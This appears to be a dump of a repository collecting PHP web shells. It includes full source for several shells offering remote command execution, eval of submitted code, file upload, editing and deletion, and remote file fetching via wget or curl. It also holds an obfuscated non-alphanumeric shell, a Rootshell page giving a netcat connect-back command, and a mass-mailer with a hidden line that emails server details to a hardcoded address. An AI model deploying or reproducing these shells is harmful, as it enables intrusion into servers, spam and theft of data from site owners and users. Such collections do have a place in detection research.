├── .gitmodules ├── Collection ├── 529.php ├── AK-74.php ├── Ajax_PHP_Command_Shell.php ├── Antichat_Shell.php ├── Ayyildiz_Tim.php ├── CasuS-1.5.php ├── CrystalShell.php ├── DTool_Pro.php ├── Dive_Shell.php ├── GFS_web-shell.php ├── GRP_WebShell.php ├── Gamma_Web_Shell.php ├── JspWebshell_1.2.php ├── KA_uShell_0.1.6.php ├── Loaderz_WEB_Shell.php ├── Mackers_Private_Shell.php ├── Moroccan_Spamers.php ├── MySQL_Web_Interface.php ├── MyShell.php ├── Mysql_interface_v1.0.php ├── NCC-Shell.php ├── NGH.php ├── NTDaddy_v1.9.php ├── Non-alphanumeric.php ├── PHANTASMA.php ├── PHPRemoteView.php ├── PHP_Shell.php ├── PHVayv.php ├── PhpSpy.php ├── Predator.php ├── Rootshell.v.1.0.php ├── STNC_WebShell_v0.8.php ├── Safe0ver_Shell.php ├── Safe_Mode_Bypass.php ├── SimAttacker.php ├── SimShell.php ├── Simple-Webshell.php ├── Simple_PHP_backdoor.php ├── Sincap_1.0.php ├── Small_Web_Shell.php ├── Uploader.php ├── WinX_Shell.php ├── Worse_Linux_Shell.php ├── ZyklonShell.php ├── aZRaiLPhp_v1.0.php ├── accept_language.php ├── alfa3.php ├── andela.php ├── aspydrv.php ├── b374k-mini-shell.php ├── backupsql.php ├── bloodsecv4.php ├── by.php ├── c0derz_shell.php ├── c99_locus7s.php ├── c99_madnet.php ├── c99ud.php ├── cgitelnet.php ├── cmd.php ├── configkillerionkros.php ├── cpanel.php ├── cw.php ├── cybershell.php ├── dC3_Security.php ├── easy-simple-php-webshell.php ├── erne.php ├── ex0shell.php ├── fatal.php ├── ftpsearch.php ├── g00nshell-v1.3.php ├── go-shell.php ├── h4ntu_shell.php ├── hiddens_shell.php ├── ironshell.php ├── jspshell.jsp ├── kral.php ├── lamashell.php ├── lifkaS.php ├── load_shell.php ├── lolipop.php ├── lostDC.php ├── matamu.php ├── megabor.php ├── mini.php ├── mysql_tool.php ├── nshell.php ├── obfuscated-punknopass.php ├── pHpINJ.php ├── php-backdoor.php ├── php-findsock-shell.php ├── php-include-w-shell.php ├── php-reverse-shell.php ├── php-web-shell.php ├── punk-nopass.php ├── punkholic.php ├── pws.php ├── qsd-backdoor.php ├── r57.php ├── robots.php ├── rootshell.php ├── ru24_post_sh.php ├── s72_Shell.php ├── safe0ver.php ├── simattacker.php ├── simple-backdoor.php ├── simple_cmd.php ├── small.php ├── smevk.php ├── soldierofallah.php ├── sosyete.php ├── spygrup.php ├── stres.php ├── toolaspshell.php ├── tryag.php ├── web-shell.php ├── wso2.8.5.php ├── wwwolf-webshell.php ├── zaco.php ├── zacosmall.php └── zehir4.php └── README.md /.gitmodules: -------------------------------------------------------------------------------- 1 | [submodule "b374k"] 2 | path = b374k 3 | url = https://github.com/b374k/b374k 4 | -------------------------------------------------------------------------------- /Collection/529.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/226a15d0684e2f893caed0b94fbbf0037b89adea/Collection/529.php -------------------------------------------------------------------------------- /Collection/AK-74.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/226a15d0684e2f893caed0b94fbbf0037b89adea/Collection/AK-74.php -------------------------------------------------------------------------------- /Collection/Antichat_Shell.php: -------------------------------------------------------------------------------- 1 | 11 | BODY{ 12 | background-color: #2B2F34; 13 | color: #C1C1C7; 14 | font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif; 15 | MARGIN-TOP: 0px; 16 | MARGIN-BOTTOM: 0px; 17 | MARGIN-LEFT: 0px; 18 | MARGIN-RIGHT: 0px; 19 | margin:0; 20 | padding:0; 21 | scrollbar-face-color: #336600; 22 | scrollbar-shadow-color: #333333; 23 | scrollbar-highlight-color: #333333; 24 | scrollbar-3dlight-color: #333333; 25 | scrollbar-darkshadow-color: #333333; 26 | scrollbar-track-color: #333333; 27 | scrollbar-arrow-color: #333333; 28 | } 29 | input{ 30 | background-color: #336600; 31 | font-size: 8pt; 32 | color: #FFFFFF; 33 | font-family: Tahoma; 34 | border: 1 solid #666666; 35 | } 36 | select{ 37 | background-color: #336600; 38 | font-size: 8pt; 39 | color: #FFFFFF; 40 | font-family: Tahoma; 41 | border: 1 solid #666666; 42 | } 43 | textarea{ 44 | background-color: #333333; 45 | font-size: 8pt; 46 | color: #FFFFFF; 47 | font-family: Tahoma; 48 | border: 1 solid #666666; 49 | } 50 | a:link{ 51 | 52 | color: #B9B9BD; 53 | text-decoration: none; 54 | font-size: 8pt; 55 | } 56 | a:visited{ 57 | color: #B9B9BD; 58 | text-decoration: none; 59 | font-size: 8pt; 60 | } 61 | a:hover, a:active{ 62 | width: 100%; 63 | background-color: #A8A8AD; 64 | 65 | 66 | color: #E7E7EB; 67 | text-decoration: none; 68 | font-size: 8pt; 69 | } 70 | td, th, p, li{ 71 | font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif; 72 | border-color:black; 73 | } 74 | '; 75 | $header=''.getenv("HTTP_HOST").' - Antichat Shell'.$style.''; 76 | $footer=''; 77 | 78 | //error parser 79 | $filext="File already exists."; 80 | $uploadok="File was successfully uploaded."; 81 | $dircrt="Dir is created."; 82 | $dircrterr="Don't create dir."; 83 | $dirnf="Dir not found."; 84 | $empty="Directory not empty or access denide."; 85 | $deletefileok="File deleted"; 86 | $deletedirok="Dir deleted"; 87 | //end error parser 88 | 89 | //auth 90 | if(@$_POST['action']=="exit")unset($_SESSION['an']); 91 | if($auth==1){if(@$_POST['login']==$login && @$_POST['password']==$password)$_SESSION['an']=1;}else $_SESSION['an']='1'; 92 | if(@$_SESSION['an']==0){ 93 | echo $header; 94 | echo '
Login:
Password:
'; 95 | echo $footer; 96 | exit;} 97 | //end auth 98 | 99 | function createdir($dir){if(@mkdir($dir))echo $GLOBALS['dircrt']." "; else echo $GLOBALS['dircrterr']." ";} 100 | 101 | 102 | 103 | if($_SESSION['action']=="")$_SESSION['action']="viewer"; 104 | if(@$_POST['action']!="" )$_SESSION['action']=$_POST['action'];$action=$_SESSION['action']; 105 | if(@$_POST['dir']!="")$_SESSION['dir']=$_POST['dir'];$dir=$_SESSION['dir']; 106 | 107 | $dir=chdir($dir); 108 | $dir=getcwd()."/"; 109 | $dir=str_replace("\\","/",$dir); 110 | 111 | 112 | 113 | 114 | 115 | 116 | //crdir 117 | 118 | 119 | if(@$_POST['file']!=""){$file=$_SESSION['file']=$_POST['file'];}else {$file=$_SESSION['file']="";} 120 | 121 | //Current type OS 122 | if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $win=1; else $win=0; 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | //downloader 131 | if($action=="download"){ 132 | header('Content-Length:'.filesize($file).''); 133 | header('Content-Type: application/octet-stream'); 134 | header('Content-Disposition: attachment; filename="'.$file.'"'); 135 | readfile($file); 136 | } 137 | //end downloader 138 | 139 | //delete file 140 | if($action=="delete"){ 141 | if(unlink($file)) $msgnotice.=$deletefileok; 142 | } 143 | //end delete 144 | 145 | //delete dir 146 | if($action=="deletedir"){ 147 | if(!rmdir($file)) $msgnotice.=$GLOBALS['empty'];else $msgnotice.=$deletedirok; 148 | 149 | } 150 | //end delete 151 | ?> 152 | 153 | 154 | 155 |
156 | 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | 165 | 166 |
| Shell | Viewer| Editor| Upload| Php Eval| EXIT | <-back | forward->|

167 |
168 | 169 | 170 | 171 |
172 | 173 | "; 309 | if($GLOBALS['win']==1)echo $form_win; 310 | if($GLOBALS['win']==0){ 311 | echo $form_win; 312 | echo ''; 314 | } 315 | 316 | if(@$_POST['uploadloc']){ 317 | if(@$_POST['filename']=="") $uploadfile = $dirupload.basename($_FILES['file']['name']); else 318 | $uploadfile = $dirupload."/".$_POST['filename']; 319 | 320 | if(!file_exists($dirupload)){createdir($dirupload);} 321 | if(file_exists($uploadfile))echo $GLOBALS['filext']; 322 | elseif (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) 323 | echo $GLOBALS['uploadok']; 324 | } 325 | 326 | if(@$_POST['upload']){ 327 | if (!empty($_POST['with']) && !empty($_POST['urldown']) && !empty($_POST['filename'])) 328 | switch($_POST['with']) 329 | { 330 | case wget: 331 | shell(which('wget')." ".$_POST['urldown']." -O ".$_POST['filename'].""); 332 | break; 333 | case fetch: 334 | shell(which('fetch')." -o ".$_POST['filename']." -p ".$_POST['urldown'].""); 335 | break; 336 | case lynx: 337 | shell(which('lynx')." -source ".$_POST['urldown']." > ".$_POST['filename'].""); 338 | break; 339 | case links: 340 | shell(which('links')." -source ".$_POST['urldown']." > ".$_POST['filename'].""); 341 | break; 342 | case GET: 343 | shell(which('GET')." ".$_POST['urldown']." > ".$_POST['filename'].""); 344 | break; 345 | case curl: 346 | shell(which('curl')." ".$_POST['urldown']." -o ".$_POST['filename'].""); 347 | break; 348 | } 349 | } 350 | 351 | } 352 | //end upload section 353 | 354 | 355 | if($action=="phpeval"){ 356 | echo " 357 | 358 | 359 | <?php
360 |
361 | ?>
362 | ";} 363 | if(@$_POST['phpev']!=""){echo eval($_POST['phpev']);} 364 | ?> 365 |
174 | 175 | 176 | 194 | 195 |
196 |
197 | ";} 198 | //end shell 199 | 200 | 201 | //viewer FS 202 | function perms($file) 203 | { 204 | $perms = fileperms($file); 205 | if (($perms & 0xC000) == 0xC000) {$info = 's';} 206 | elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} 207 | elseif (($perms & 0x8000) == 0x8000) {$info = '-';} 208 | elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} 209 | elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} 210 | elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} 211 | elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} 212 | else {$info = 'u';} 213 | $info .= (($perms & 0x0100) ? 'r' : '-'); 214 | $info .= (($perms & 0x0080) ? 'w' : '-'); 215 | $info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-')); 216 | $info .= (($perms & 0x0020) ? 'r' : '-'); 217 | $info .= (($perms & 0x0010) ? 'w' : '-'); 218 | $info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-')); 219 | $info .= (($perms & 0x0004) ? 'r' : '-'); 220 | $info .= (($perms & 0x0002) ? 'w' : '-'); 221 | $info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-')); 222 | return $info; 223 | } 224 | 225 | function view_size($size) 226 | { 227 | if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} 228 | elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} 229 | elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} 230 | else {$size = $size . " B";} 231 | return $size; 232 | } 233 | 234 | function scandire($dir){ 235 | 236 | 237 | 238 | echo ""; 239 | echo ""; 240 | 241 | if (is_dir($dir)) { 242 | if (@$dh = opendir($dir)) { 243 | while (($file = readdir($dh)) !== false) { 244 | if(filetype($dir . $file)=="dir") $dire[]=$file; 245 | if(filetype($dir . $file)=="file")$files[]=$file; 246 | } 247 | closedir($dh); 248 | @sort($dire); 249 | @sort($files); 250 | 251 | 252 | if ($GLOBALS['win']==1) { 253 | echo ""; 258 | } 259 | echo " 260 | "; 261 | for($i=0;$i'; 264 | } 265 | for($i=0;$i 268 | 269 | 273 | '; 274 | } 275 | echo "
Open directory:
Select drive:"; 254 | for ($j=ord('C'); $j<=ord('Z'); $j++) 255 | if (@$dh = opendir(chr($j).":/")) 256 | echo ' '.chr($j).''; 257 | echo "
OS: ".@php_uname()."
name dirs and filestypesizepermissionoptions
'.$dire[$i].'dir'.perms($link).'X
'.$files[$i].'
file'.view_size(filesize($linkfile)).''.perms($linkfile).' 270 | D 271 | E 272 | X
"; 276 | }}} 277 | 278 | if($action=="viewer"){ 279 | scandire($dir); 280 | } 281 | //end viewer FS 282 | 283 | //editros 284 | if($action=="editor"){ 285 | function writef($file,$data){ 286 | $fp = fopen($file,"w+"); 287 | fwrite($fp,$data); 288 | fclose($fp); 289 | } 290 | function readf($file){ 291 | if(!$le = fopen($file, "r")) $contents="Can't open file, permission denide"; else { 292 | $contents = fread($le, filesize($file)); 293 | fclose($le);} 294 | return htmlspecialchars($contents); 295 | } 296 | if(@$_POST['save'])writef($file,$_POST['data']); 297 | echo "
298 | 299 | 300 |
301 |
"; 302 | } 303 | //end editors 304 | 305 | //upload 306 | if($action=="upload"){ 307 | if(@$_POST['dirupload']!="") $dirupload=$_POST['dirupload'];else $dirupload=$dir; 308 | $form_win="
Upload to dir:
New file name:
File addres: 313 |
COPYRIGHT BY ANTICHAT.RU
366 | -------------------------------------------------------------------------------- /Collection/Ayyildiz_Tim.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/226a15d0684e2f893caed0b94fbbf0037b89adea/Collection/Ayyildiz_Tim.php -------------------------------------------------------------------------------- /Collection/CasuS-1.5.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/226a15d0684e2f893caed0b94fbbf0037b89adea/Collection/CasuS-1.5.php -------------------------------------------------------------------------------- /Collection/CrystalShell.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/226a15d0684e2f893caed0b94fbbf0037b89adea/Collection/CrystalShell.php -------------------------------------------------------------------------------- /Collection/Dive_Shell.php: -------------------------------------------------------------------------------- 1 | array('pipe', 'w'), 65 | 2 => array('pipe', 'w')), 66 | $io); 67 | 68 | 69 | while (!feof($io[1])) { 70 | $_SESSION['output'] .= htmlspecialchars(fgets($io[1]), 71 | ENT_COMPAT, 'UTF-8'); 72 | } 73 | 74 | while (!feof($io[2])) { 75 | $_SESSION['output'] .= htmlspecialchars(fgets($io[2]), 76 | ENT_COMPAT, 'UTF-8'); 77 | } 78 | 79 | fclose($io[1]); 80 | fclose($io[2]); 81 | proc_close($p); 82 | } 83 | } 84 | 85 | 86 | if (empty($_SESSION['history'])) { 87 | $js_command_hist = '""'; 88 | } else { 89 | $escaped = array_map('addslashes', $_SESSION['history']); 90 | $js_command_hist = '"", "' . implode('", "', $escaped) . '"'; 91 | } 92 | 93 | 94 | header('Content-Type: text/html; charset=UTF-8'); 95 | 96 | echo '' . "\n"; 97 | ?> 98 | 99 | 100 | Dive Shell - Emperor Hacking Team 101 | 102 | 103 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 |

 Directory: 152 | 153 |

154 | 155 |
156 |
157 |

158 | Command: 160 |   161 | 162 |  

169 |

170 | Rows: 171 |

172 |

173 | Edited By Emperor Hacking Team

174 |

175 | iM4n - FarHad - imm02tal - R$P
176 |  

177 |
178 |
179 | 180 | 181 |

182 |   183 |

184 | 185 | 186 | 187 | 188 | -------------------------------------------------------------------------------- /Collection/GFS_web-shell.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/226a15d0684e2f893caed0b94fbbf0037b89adea/Collection/GFS_web-shell.php -------------------------------------------------------------------------------- /Collection/JspWebshell_1.2.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/226a15d0684e2f893caed0b94fbbf0037b89adea/Collection/JspWebshell_1.2.php -------------------------------------------------------------------------------- /Collection/KA_uShell_0.1.6.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/226a15d0684e2f893caed0b94fbbf0037b89adea/Collection/KA_uShell_0.1.6.php -------------------------------------------------------------------------------- /Collection/Loaderz_WEB_Shell.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/226a15d0684e2f893caed0b94fbbf0037b89adea/Collection/Loaderz_WEB_Shell.php -------------------------------------------------------------------------------- /Collection/Moroccan_Spamers.php: -------------------------------------------------------------------------------- 1 | 11 |
12 |
13 |
14 | 15 | 16 | 110 | 111 |
17 |
18 |
19 | 20 | 21 | 105 | 106 |
22 |

23 |
24 | 25 | 26 | 101 | 102 |
27 | 28 | 29 | 31 | 32 | 33 | 37 | 41 | 44 | 45 | 46 | 49 | 53 | 56 | 57 | 58 | 61 | 64 | 65 | 66 | 84 | 98 | 99 |
30 |

Moroccan Spamers Ma-EditioN By GhOsT

34 |
Your 35 | Email:
36 | 		38 |
Your 39 | Name:
40 | 		42 | 43 |
47 |
Reply-To:
48 | 		50 |
Attach 51 | File:
52 | 		54 | 55 |
59 |
Subject:
60 | 		62 | 63 |
67 |
68 | 69 | 70 | 80 | 81 |
71 | 72 |
73 | 74 | Plain 75 | 76 | HTML 77 | 78 | 79 |
82 |
83 | 		85 |
86 |
87 | 88 | 89 | 93 | 94 |
90 |

91 |
92 |

95 |
96 |
97 |
100 |
103 |
104 |
107 |
108 |
109 |
112 |
113 |
114 |
115 |
116 | 117 | 118 | 121 | 122 |
119 |

Designed by: 120 | v1.5

123 |
124 |
125 |
126 | 127 | \r\nReply-To: $replyto\r\n"; 156 | $header .= "MIME-Version: 1.0\r\n"; 157 | If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n"; 158 | If ($file_name) $header .= "--$uid\r\n"; 159 | $header .= "Content-Type: text/$contenttype\r\n"; 160 | $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n"; 161 | $header .= "$message\r\n"; 162 | If ($file_name) $header .= "--$uid\r\n"; 163 | If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n"; 164 | If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n"; 165 | If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n"; $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98"); 166 | If ($file_name) $header .= "$content\r\n"; 167 | If ($file_name) $header .= "--$uid--"; 168 | mail($to, $subject, "", $header); 169 | print "Spamed'>
"; 170 | flush(); 171 | } 172 | } 173 | 174 | } 175 | ?> 176 | 177 | 178 | 179 | 180 | 181 | 182 | 183 | -------------------------------------------------------------------------------- /Collection/MyShell.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/226a15d0684e2f893caed0b94fbbf0037b89adea/Collection/MyShell.php -------------------------------------------------------------------------------- /Collection/NCC-Shell.php: -------------------------------------------------------------------------------- 1 |
2 |

.:NCC:. Shell v1.0.0

3 | .:NCC:. Shell v1.0.0 4 |

Hacked by Silver

5 |

---------------------------------------------------------------------------------------


6 | ---Server Info---
7 | Safe Mode on/off: "; 9 | // Check for safe mode 10 | if( ini_get('safe_mode') ) { 11 | print 'Safe Mode ON'; 12 | } else { 13 | print 'Safe Mode OFF'; 14 | } 15 | echo "
"; 16 | echo "Momentane Directory: "; echo $_SERVER['DOCUMENT_ROOT']; 17 | echo "
"; 18 | echo "Server:
"; echo $_SERVER['SERVER_SIGNATURE']; 19 | echo "PHPinfo"; 20 | if(@$_GET['p']=="info"){ 21 | @phpinfo(); 22 | exit;} 23 | ?> 24 |

---------------------------------------------------------------------------


25 |

- Upload -

26 | Upload - Shell/Datei 27 |
31 | 32 | 33 |
34 |
35 | \n", 41 | $_FILES['probe']['name']); 42 | printf("Sie ist %u Bytes groß und vom Typ %s.
\n", 43 | $_FILES['probe']['size'], $_FILES['probe']['type']); 44 | } 45 | ?> 46 |

---------------------------------------------------------------------------


47 |

IpLogger

48 |
IP: "; echo $_SERVER['REMOTE_ADDR']; 50 | echo "
PORT: "; echo $_SERVER['REMOTE_PORT']; 51 | echo "
BROWSER: "; echo $_SERVER[HTTP_REFERER]; 52 | echo "
REFERER: "; echo $_SERVER['HTTP_USER_AGENT']; 53 | ?> 54 |

---------------------------------------------------------------------------


55 |

Directory Lister

56 |

>

57 |

---------------------------------------------------------------------------


58 | --Coded by Silver©--
59 | ~|_Team .:National Cracker Crew:._|~
60 | -->NCC<--
61 | -------------------------------------------------------------------------------- /Collection/NGH.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/226a15d0684e2f893caed0b94fbbf0037b89adea/Collection/NGH.php -------------------------------------------------------------------------------- /Collection/NTDaddy_v1.9.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/226a15d0684e2f893caed0b94fbbf0037b89adea/Collection/NTDaddy_v1.9.php -------------------------------------------------------------------------------- /Collection/Non-alphanumeric.php: -------------------------------------------------------------------------------- 1 | >$_;$_[]=$__;$_[]=@_;@$_[((++$__)+($__++ ))].=$_; 4 | $_[]=++$__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__]; 5 | $_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] ); 6 | $_[$__+$__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] ); 7 | $_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ]; 8 | $_=$ 9 | $_[$__+ $__] ;$_[@-_]($_[@!+_] ); 10 | 11 | ?> -------------------------------------------------------------------------------- /Collection/PHANTASMA.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/226a15d0684e2f893caed0b94fbbf0037b89adea/Collection/PHANTASMA.php -------------------------------------------------------------------------------- /Collection/PHPRemoteView.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/226a15d0684e2f893caed0b94fbbf0037b89adea/Collection/PHPRemoteView.php -------------------------------------------------------------------------------- /Collection/PHVayv.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/226a15d0684e2f893caed0b94fbbf0037b89adea/Collection/PHVayv.php -------------------------------------------------------------------------------- /Collection/PhpSpy.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/226a15d0684e2f893caed0b94fbbf0037b89adea/Collection/PhpSpy.php -------------------------------------------------------------------------------- /Collection/Rootshell.v.1.0.php: -------------------------------------------------------------------------------- 1 | 61 | 72 | 73 | 74 | 79 |
80 | 
 ____             _         ____  _          _ _
 81 | |  _ \ ___   ___ | |_      / ___|| |__   ___| | |
 82 | | |_) / _ \ / _ \| __|     \___ \| '_ \ / _ \ | |
 83 | |  _ < (_) | (_) | |_   _   ___) | | | |  __/ | |
 84 | |_| \_\___/ \___/ \__| (_) |____/|_| |_|\___|_|_|
85 |
86 |
87 |
88 | 89 |
90 |
91 |

92 | Safe Mode ON'; 96 | } else { 97 | print 'Safe Mode OFF'; 98 | } 99 | 100 | ?> 101 |  

!
102 |   103 | 104 | 106 | 107 | 108 | 118 |
105 |

[ Server Info ]

109 |

110 | Current Directory: 111 |
112 | Shell: 113 |
114 | Server Software:
115 | Server Name:
116 | Server Protocol:
117 |


119 | 120 | 121 | 123 | 125 | 126 | 127 | 194 | 195 | 196 | 197 | 199 | 201 | 202 | 203 | 219 | 232 | 233 |
122 |

[ Command Execute ]

 124 |

[ File Upload ]

128 |

129 |

130 |
131 | Insert your commands here:
132 |
133 |
134 |

135 |  

136 |
137 |

138 |
139 |
140 | Info: For a connect 141 | back Shell, use: nc -e cmd.exe [SERVER] 3333
142 | after local command: nc -v -l -p 3333 (Windows)


143 |

144 |


145 |
146 | Here you can upload some files.
147 |
148 |
149 |
150 |  
151 |
152 |  

153 |
154 | File already exist

"; 175 | } 176 | 177 | else 178 | { 179 | copy($file,"$filename"); 180 | if( file_exists($filename)) 181 | { 182 | echo "

File uploaded successful

"; 183 | } 184 | elseif(! file_exists($filename)) 185 | { 186 | echo "

File not found

"; 187 | } 188 | } 189 | } 190 | ?> 191 | 192 |

193 |

198 |

[ Files & Directories ]

 200 |

[ File Inclusion ]

204 |
205 |

206 | 207 | '.$file.'
'; 212 | } 213 | closedir($folder); 214 | ?>

215 | 216 |

217 |
218 |  

 

 220 |


221 | Include 222 | something :)
223 |
224 |  

225 |

226 |
227 |
228 |

229 |
230 | 231 |
234 |
235 |
236 |

237 |
238 |
239 | 240 | 241 | 243 | 244 |
242 |

Rootshell v 2006 by SR-Crew

245 |
246 |
-------------------------------------------------------------------------------- /Collection/STNC_WebShell_v0.8.php: -------------------------------------------------------------------------------- 1 | $v) 11 | { $_POST[$k] = stripslashes($v); } 12 | 13 | /* 14 | $login='root'; 15 | $hash='b1b3773a05c0ed0176787a4f1574ff0075f7521e'; // sha1("qwerty") 16 | 17 | if(!(($_SERVER["PHP_AUTH_USER"]===$login)&&(sha1($_SERVER["PHP_AUTH_PW"])===$hash))) 18 | { 19 | header("HTTP/1.0 401 Unauthorized"); 20 | header("WWW-Authenticate: Basic"); 21 | die(); 22 | } 23 | */ 24 | 25 | function fe($s) 26 | {return function_exists($s);} 27 | function cmd($s) 28 | {if(fe("exec")){exec($s,$r);$r=join("\n",$r);} 29 | elseif(fe("shell_exec"))$r=shell_exec($s); 30 | elseif(fe("system")){ob_start();system($s);$r=ob_get_contents();ob_end_clean();} 31 | elseif(fe("passthru")){ob_start();passthru($s);$r=ob_get_contents();ob_end_clean();} 32 | elseif(is_resource($f=popen($s,"r"))){$r="";while(!feof($f))$r.=fread($f,512);pclose($f);} 33 | else $r=`$s`;return $r;} 34 | function safe_mode_is_on() 35 | {return ini_get('safe_mode');} 36 | function str100($s) 37 | {if(strlen($s)>100) $s=substr($s,0,100)."..."; return $s;} 38 | function id() 39 | {return str100(cmd("id"));} 40 | function uname() 41 | {return str100(cmd("uname -a"));} 42 | 43 | function edit($size, $name, $val) 44 | { return ""; } 45 | function button($capt) 46 | { return ""; } 47 | function hidden($name, $val) 48 | { return ""; } 49 | function hidden_pwd() 50 | { global $location; return hidden("pwd",$location);} 51 | 52 | $action_edit = false; 53 | 54 | $printline = ""; 55 | 56 | if(isset($_POST["action"])) $action = $_POST["action"]; 57 | else $action = "cmd"; 58 | 59 | if(isset($_POST["pwd"])) 60 | { $pwd = $_POST["pwd"]; $type = filetype($pwd); if($type === "dir")chdir($pwd); else $printline = "\"$pwd\" - no such directory."; } 61 | 62 | $location = getcwd(); 63 | 64 | if(($action === "download")&&(isset($_POST["fname"]))) 65 | { 66 | $fname = $_POST["fname"]; 67 | if(file_exists($fname)) 68 | { 69 | $pathinfo = pathinfo($fname); 70 | header("Content-Transfer-Encoding: binary"); 71 | header("Content-type: application/x-download"); 72 | header("Content-Length: ".filesize($fname)); 73 | header("Content-Disposition: attachment; filename=".$pathinfo["basename"]); 74 | readfile($fname); 75 | die(); 76 | } 77 | else 78 | $printline = "\"$fname\" - download failed."; 79 | } 80 | 81 | echo " STNC WebShell v$version 88 | 89 | 157 | 158 | 159 | 160 | 165 | 166 | 167 |
  STNC WebShell v$version  id: ".id()."
uname: ".uname()."
your ip: ".$_SERVER["REMOTE_ADDR"]." - server ip: ".gethostbyname($_SERVER["HTTP_HOST"])." - safe_mode: ".((safe_mode_is_on()) ? "on" : "off")."
".hidden("action","save").hidden_pwd()."".(($action_edit) ? "
".button(" Save ").hidden("fname",$fname):"")."
".hidden("action","cmd")."
Command: ".edit(85,"cmd","")."
Location: ".edit(85,"pwd",$location)." ".button("Execute")."
".hidden("action","edit").hidden_pwd()."
Edit file:".edit(85,"fname",$location)."".button(" Edit ")."
". 161 | hidden("action","download").hidden_pwd()."
File:".edit(50,"fname",$location)."".button("Download")."
162 |
". 163 | hidden("action","upload").hidden_pwd()."
File:
To file:".edit(50,"fname",$location)." ".button("Upload")."
164 |
".hidden("action","eval").hidden_pwd()."

".button(" Eval ")."
Coded by drmist | http://drmist.ru | http://www.security-teams.net | not enough functions? | (c) 2006 [STNC]
"; 168 | ?> -------------------------------------------------------------------------------- /Collection/Safe0ver_Shell.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/226a15d0684e2f893caed0b94fbbf0037b89adea/Collection/Safe0ver_Shell.php -------------------------------------------------------------------------------- /Collection/Safe_Mode_Bypass.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 |

!Safe 6 | Mode Shell v1.0!

7 |
8 |

9 |

10 |
11 |
12 |

18 |
19 | 20 | 21 | 25 | */ 26 | 27 | echo "Safe Mode Shell"; 28 | 29 | 30 | 31 | 32 | $tymczas="./"; // Set $tymczas to dir where you have 777 like /var/tmp 33 | 34 | if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") 35 | { 36 | $safemode = true; 37 | $hsafemode = "ON (secure)"; 38 | } 39 | else {$safemode = false; $hsafemode = "OFF (not secure)";} 40 | echo("Safe-mode: $hsafemode"); 41 | $v = @ini_get("open_basedir"); 42 | if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "".$v."";} 43 | else {$openbasedir = false; $hopenbasedir = "OFF (not secure)";} 44 | echo("
"); 45 | echo("Open base dir: $hopenbasedir"); 46 | echo("
